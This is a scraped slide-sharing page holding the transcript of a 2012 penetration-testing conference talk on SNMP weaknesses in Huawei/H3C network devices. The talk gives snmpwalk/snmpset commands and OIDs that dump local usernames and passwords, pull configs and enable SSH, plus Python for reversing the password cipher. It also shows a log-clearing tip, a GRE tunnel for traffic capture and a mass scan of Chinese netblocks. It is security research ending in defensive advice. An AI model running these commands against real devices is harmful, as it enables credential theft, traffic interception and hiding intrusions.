A Taxonomy of Clustering, or, No Container is an IslandA Taxonomy of Clustering, or, No Container is an Island
A Taxonomy of Clustering, or, No Container is an Island
 
HTTP/3 is next generation HTTP
HTTP/3 is next generation HTTPHTTP/3 is next generation HTTP
HTTP/3 is next generation HTTP
 
Practical Operation Automation with StackStorm
Practical Operation Automation with StackStormPractical Operation Automation with StackStorm
Practical Operation Automation with StackStorm
 
Distributed tracing 101
Distributed tracing 101Distributed tracing 101
Distributed tracing 101
 
The Data Center and Hadoop
The Data Center and HadoopThe Data Center and Hadoop
The Data Center and Hadoop
 
Magie di git
Magie di gitMagie di git
Magie di git
 
Terraform: Tales from the Trenches
Terraform: Tales from the TrenchesTerraform: Tales from the Trenches
Terraform: Tales from the Trenches
 

Último

SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 

Último (20)

SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 

A CouNtry's Honerable n3twork deviCes

  • 1. A  CouNtry's  Honorable  n3twork   deviCes   Bay  Threat  2012   @grutz   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes  
  • 2. BACKGROUND   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   2  
  • 3. Disclaimer   Any  content  or  opinion  stated  herein  is  that  of  myself   and  not  of  my  employer.  The  informaGon  is  being   provided  “as-­‐is”  and  as  a  convenience,  for   informaGonal  purposes  only.  Any  resemblance  to  real   persons,  living  or  dead,  is  purely  coincidental.  No   warranty  is  expressed  or  implied.  Not  responsible  for   direct,  indirect,  incidental  or  consequenGal  damages   resulGng  from  any  defect,  error  or  failure  to  perform.   For  recreaGonal  use  only.  May  be  too  intense  for  some   viewers.   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   3  
  • 4. POLITICS!   This  presentaGon  does  not  care  about  the  poli%cs   between  China,  the  US  and  any  companies     Data  is  presented  to  show  the  pervasive  risk  these  new   vulnerabiliGes  create     China  was  only  used  because  they  have  the  largest   install  base  of  Huawei  and  H3C  equipment  available  via   the  Internet!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   4  
  • 5. About  @grutz….   PenetraGon  tester     In  the  business  of   breaking  into  businesses   business  business   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   5  
  • 6. The  Huawei/H3C/HP  Timeline   Bain  Capital  /   Huawei-­‐3Com   Huawei  /   HP  Acquires   Partnership   3Com  deal   H3C   2006   Sep  28,  2007   April  12,  2010   H3C  is  born!   US  Gov’t   US  Gov’t   Smackdown   Huawei/ZTE   May  7,  2007   2008   Smackdown     Oct  8,  2012   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   6  
  • 7. Huawei  !=  H3C   ...except  when  they  are  (so`ware)     Since  the  creaGon  of  H3C  by  Huawei-­‐3Com  the  two   companies  diverged  their  product  lines.  Yet  they  sGll   shared  a  very  similar  code  origin  (and  bugs!)     VulnerabiliGes  described  here  and  in  FX’s  talk  can   generally  affect  Huawei  devices  in  the  Huawei-­‐3Com   years  (2006-­‐2010)  and  all  H3C  devices       BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   7  
  • 8. FX’s  Huawei  DEFCON  Bomb   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   8  
  • 9. Huawei’s  July  31,  2012  Response  to  c|net   hfp://news.cnet.com/8301-­‐1009_3-­‐57482813-­‐83/expert-­‐huawei-­‐routers-­‐are-­‐riddled-­‐with-­‐vulnerabiliGes/   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   9  
  • 10. LETS  TALK  BIG  BANG   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   10  
  • 11. Overflows  are  cool…   …but  they’re  finicky  lifle  beasts   Huawei/H3C  not  as  bad  as  Cisco  IOS  but,  sGll..  How   many  Gmes  have  you  used  an  IOS  buffer  overflow?   No,  really…   Be  serious  here!     Now  how  many  Gmes  have  you  used  SNMP  to   download  device  configs?     Which  would  you  rely  upon  for  network  penetraGon?   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   11  
  • 12. h3c  (old)  vs  hh3c  (new)   For a node in the H3C new-style MIB files, its name starts with hh3c, and its OID starts with 1.3.6.1.4.1.25506; for a node in the H3C compatible- style MIB files, its name starts with h3c, and its OID starts with 1.3.6.1.4.1.2011.10. For example, node hh3cCfgOperateType with the OID of 1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c- config-man.mib, and node h3cCfgOperateType with the OID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2 is in file h3c-config-man.mib. Both of the two nodes indicate the same variable in the agent, but they are in different MIB style. By default, devices use H3C new-style MIB files; http://www.h3c.com/portal/Products___Solutions/Technology/ System_Management/Configuration_Example/ 200912/656452_57_0.htm#_Toc247357228 BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   12  
  • 13. (T)FTP  File  Transfers:  hh3c-­‐config-­‐man   Funcaon   OID   Operator   OperaGon  type   1.3.6.1.4.1.25506.2.4.1.2.4.1.2.xx   1  –  running2Startup   2  –  startup2Running   3  –  running2Net   4  –  net2Running   5  –  net2Startup   6  –  startup2Net   Protocol   1.3.6.1.4.1.25506.2.4.1.2.4.1.3.xx   1  –  `p   2  –  qtp   3  –  cluster`p   4  –  clusterqtp   Filename   1.3.6.1.4.1.25506.2.4.1.2.4.1.4.xx   filename   DesGnaGon  IP  Address   1.3.6.1.4.1.25506.2.4.1.2.4.1.5.xx   IpAddress   Username   1.3.6.1.4.1.25506.2.4.1.2.4.1.6.xx   FTP  Username   Password   1.3.6.1.4.1.25506.2.4.1.2.4.1.7.xx   FTP  Password   RowStatus   1.3.6.1.4.1.25506.2.4.1.2.4.1.9.xx   4  –  go  go  go  move  move  move!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   13  
  • 14. hh3c-­‐config-­‐man  caveats   Support  it  spofy  between  device  types    Mostly  routers  and  switches  work    H3C  ERxxxx  Series:  OpType  =  1  (system2net)   Downloads  are  logged   Requires  Read/Write  community  string   Buggy!    Manual  “snmpset”  worked  some  of  the  Gme    Metasploit  module  worked  some  of  the  Gme   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   14  
  • 15. Let’s  script…   hfps://github.com/grutz/h3c-­‐pt-­‐tools/blob/master/hh3c-­‐snmpdl.sh   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   15  
  • 16. HP/H3C,  SNMP,  LOCAL  ACCOUNTS  AND  YOU!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   16  
  • 17. Usernames  and  Passwords  in  SNMP?  Never!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   17  
  • 18. Huawei/H3C  Password  Encrypaon  Types   (h)h3cAuthMode  designates  encrypGon  storage  type:    0:  No  encrypGon    3:  Ciphertext  “encrypGon”      7-­‐CZB#/YX]KQ=^Q`MAF4<1!!    9:  SHA-­‐256  encrypGon      $key$hash_digest_value      (Since  2007,  Mostly  AR  devices)   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   18  
  • 19. hh3cUserLevel  /  hh3cUserState   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   19  
  • 20. What  is  MAX-­‐ACCESS  and  read-­‐create?     RFC-­‐1902:  SMI  for  SNMPv2   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   20  
  • 21. …so  it’s  protected,  right?   Sure  it  is!   Unless  you  know  the  SNMP  READ  ONLY  string…   This  was  probably  a  bug…  or  a  misunderstanding…   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   21  
  • 22. Lets  glob  some  users!   $  snmpwalk  –c  public  –v  1  <host>     1.3.6.1.4.1.2011.10.2.12.1.1.1     Walks  the  locally  defined  list  of  users:     local user <username> password <clear|cipher|sha256> <value> level [0|1|2|3]     BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   22  
  • 23. Let’s  Weaponize  it!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   23  
  • 24. Other  SNMP  goodies…   (h)h3c-­‐dot11-­‐cfg  –  (requires  R/W  access)    SSID  /  PSKs   snmpwalk –v 1 –c private ip-address 1.3.6.1.4.1.2011.10.2.75   (h)h3c-­‐ssh  -­‐  (requires  R/W  access)   SSH  Server  disabled?  Enable  it!   snmpset –v 1 –c private ip-address 1.3.6.1.4.1.25506.2.22.1.1.1.7 i 1     BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   24  
  • 25. Strap  In  and  Let’s  Scan  China!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   25  
  • 26. INCONCEIVABLE!   hfp://www.okean.com/chinacidr.txt   2,444  netblocks   290,118,656  hosts   Only  care  about  SNMP     Onesixtyone  to  the  rescue!   Originally  by  Solar  Eclipse   Updated  in  2011  by  Paul  Flo  Williams:   hfps://github.com/hisdeedsaredust/onesixtyone   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   26  
  • 27. L33t  b@$h  sk1ddy     For  best  results  use  a  VPS/host  from  a  country  China  trusts   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   27  
  • 28. BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   28  
  • 29. China  Network  Device  Counts  (Oct  2012)   140,000   120,000   Huawei  /  H3C,   117,033   100,000   Huawei  /  H3C,   88,517   80,000   ZTE,  64,579   SNMP  R/O   60,000   SNMP  R/W   40,000   ZTE,  33,669   20,000   Cisco,  11,278   vxWorks,  8,121   0   Cisco,  2,475   Juniper,  273   99   -­‐20,000     Source:  Personal  scan  of  China  Netblock  ranges  using  SNMP  strings   “public”,  “private”,  “h3c”,  “china”  and  “telecom”   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   29  
  • 30. Compare  H3C  results  from  ShodanHQ   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   30  
  • 31. (h)h3c-­‐user  Results   Devices  with  locally  defined  accounts:  15,588   Devices  with  ciphered  passwords:      5,132   Devices  with  cleartext  passwords:      15,263     Total  accounts/passwords:    33,938   Unique  passwords:        3,898   Username  ==  Password:    2,101   Unique  version  strings:      686     A  majority  of  cleartext-­‐only  passwords  were  from  one   Telecom  company.   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   31  
  • 32. What  Type  of  Accounts  are  these?   Local  users  can  be  used  for:    Remote  management  access  (telnet,  ssh,  web)    VPN  access     In  most  cases  telnet,  ssh  and  hfp  were  open  on   devices  with  locally  defined  accounts.   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   32  
  • 33. Device  type  breakdown   Huawei/H3C  VRP:          2,293   SecPath/SecBlade  Firewalls:    464   WA2xxx  Access  Points:      2,771   Huawei  Quidway:          3,205         BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   33  
  • 34. SO  ABOUT  THAT  CIPHER…   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   34  
  • 35. Huawei/H3C  Not  Unique  In  This   Weak  and  reversible  ciphers  seem  to  be  a  standard  for   all  Networking  companies  at  one  Gme:    Cisco  Type  7  Vinegere  cipher    Juniper  $9$     Generally  these  are  used  because  some  protocols  need   to  use  cleartext  passwords  yet  these  should  not  be   stored  in  the  clear.     So….why  not  ROT13?  Just  as  secure…….   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   35  
  • 36. Cipher  Examples   CLEARTEXT   CIPHER   a   D(HD%5.*MN;Q=^Q`MAF4<1!!   aa   P+J^5@ZGG[3Q=^Q`MAF4<1!!   aaa   +Q4Z3D_*-­‐N[Q=^Q`MAF4<1!!   123   7-­‐CZB#/YX]KQ=^Q`MAF4<1!!   aaaa   EHHC8L%9.F3Q=^Q`MAF4<1!!   aaaaa   X`9:NJ_A#$WQ=^Q`MAF4<1!!   aaaaaa   B.7)"^_<OGCQ=^Q`MAF4<1!!   huawei   N`C55QK<`=/Q=^Q`MAF4<1!!   aaaaaaaa   2P;JH_C3'+_Q=^Q`MAF4<1!!   2P;JH_C3'+^'^KG@[*)9LZ*ZYF[R'$:5M(0=0)*5WWQ=^Q`MAF4<<"TX aaaaaaaaaaaaaaaaaaaa   $_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!   2P;JH_C3'+^'^KG@[*)9LU<WK:`IEBCP2P;JH_C3'+_Q=^Q`MAF4<<"TX aaaaaaaaaaaaaaaaaaaaaaaa $_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!   aaaaaaaa   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   36  
  • 37. Want  more  examples?  jfgi!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   37  
  • 38. This  means  something…   Ciphers  are  24  or  88  chars  in   length     ‘!!’  at  the  end  of  everything   Base64  rotaGonal?    Good  idea,  but   no…  didn’t  pan  out.     Consistent  last  few  bytes  of  data:   Q=^Q`MAF4<1!!     Consistent  first  10  bytes   (2P;JH_C3’+)  when  the  cleartext   is  =>  8  characters   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   38  
  • 39. Probably  using  a  block-­‐based  cipher   IdenGcal  plaintext  blocks  encrypt  to  idenGcal  cipher   blocks:         BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   39  
  • 40. Binary/ASCII  Encoding   Let’s  assume  DES-­‐EBC:    Probably  a  staGc  key    Input  =  cleartext  +  null  padding              Output  =  binary  data   Binary  result  converted  to  printable  ASCII   ASCII  NOT  Base64  but  similar  (4  chars  to  3  bytes)       A  consistent  cipher  string  length  based  on  source   length  means  we’re  probably  correct.       BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   40  
  • 41. Lets  decode  to  binary!   result  =  bytearray()    cv1  =  ord(cipher[cipher_loc])      if  cv1  !=  chkval:   chkval  =  ord('a')      cv2  =  cv2  <<  6   cipher_loc  =  0    else:        cv1  =  ord('?')   #  converter  works  in  groups  of  4  until     #  cipherlen  is  reached    #  group  4   for  cnt  in  range(0,  cipherlen,  4):    cv1  =  cv1-­‐33    #  group  1    cv2  =  cv2  |  cv1    cv1  =  ord(cipher[cipher_loc])    cipher_loc  +=  1    if  cv1  ==  chkval:    cv1  =  ord(cipher[cipher_loc])      cv1  =  ord('?')    if  cv1  !=  chkval:        cv2  =  cv2  <<  6    #  group  2    else:    cv2  =  cv1-­‐33      cv1  =  ord('?')    cipher_loc  +=  1      cv1  =  ord(cipher[cipher_loc])    #  output    if  cv1  !=  chkval:    cv1  =  cv1-­‐33      cv2  =  cv2  <<  6    cv2  =  cv2  |  cv1    else:    cipher_loc  +=  1      cv1  =  ord('?')      #  group  3   result.append((cv2  &  0xff0000)  >>  16)    cv1  =  cv1-­‐33   result.append((cv2  &  0xff00)  >>  8)    cv2  =  cv2  |  cv1   result.append(cv2  &  0xff)    cipher_loc  +=  1       BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   41  
  • 42. Huawei’s  Soluaon   Use  AES-­‐256  and  updated  so`ware  for  SNMP     Yes..  AES-­‐256..  A  symmetric  cipher.     hfp://support.huawei.com/enterprise/ ReadLatestNewsAcGon.acGon? contentId=NEWS1000001141     BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   42  
  • 43. HP/H3C’s  Soluaon   Use  SHA-­‐256  on  those  systems  that  support  it     Upgrade  your  code  for  the  SNMP  fix.     hfps://h20566.www2.hp.com/portal/site/hpsc/public/ kb/docDisplay/?docId=emr_na-­‐c03515685     BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   43  
  • 44. So  about  this  SHA-­‐256…   Yeah,  salted  SHA-­‐256.  Not  reversible  but  crackable!       h3c:$eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5   pw:$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878         BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   44  
  • 45. NOW  WHAT?   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   45  
  • 46. Things  to  watch  out  for   All  commands  are  logged  locally    >  reset  logbuffer     Keyboard  keys  are  very  annoying    Backspace  is  not  backspace,  unless  it’s  ^H       BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   46  
  • 47. See  All  Packets!!!   <rtr1> system-view [rtr-1] interface tunnel 1/0/1 [rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255.255.0 [rtr-1-Tunnel1/0/1] tunnel-protocol gre [rtr-1-Tunnel1/0/1] source 10.10.1.1 [rtr-1-Tunnel1/0/1] destination 192.168.1.1 [rtr-1-Tunnel1/0/1] quit [rtr-1] ip route-static 192.168.2.1 255.255.255.0 tunnel 1/0/1 linux# modprobe ip_gre linux# ip tunnel add gre0 mode gre remote 10.10.1.1 local 192.168.1.1 ttl 255 linux# ip link set gre0 up Linux# ip addr add 10.10.10.2/24 dev gre0   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   47  
  • 48. PROTECT  YOURSELF   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   48  
  • 49. Be  protected..  Be  be  protected!   Don't  configure  local  accounts,  use  RADIUS  or  TACACS+     Don't  configure  SNMPv1     Don't  use  default  SNMP  strings     Disable  the  snmp  view  for  (h)h3c-­‐user:   snmp-­‐agent  mib-­‐view  excluded  1.3.6.1.4.1.2011.10.2.12.1.1.1   snmp-­‐agent  mib-­‐view  excluded  1.3.6.1.4.1.25506.2.12.1.1.1     Use  SHA256  passwords  if  your  image  supports  it   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   49  
  • 50. hfp://github.com/grutz/h3c-­‐pt-­‐tools/   hfp://grutztopia.jingojango.net/       Thanks  to  #metasploit,  hdm,  FX,  eMaze  (Ivan  and  Roberto),  HP/H3C  and  Huawei  IRTs,  US-­‐ CERT  and  others  whom  I  may  have  forgofen       QUESTIONS?   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   50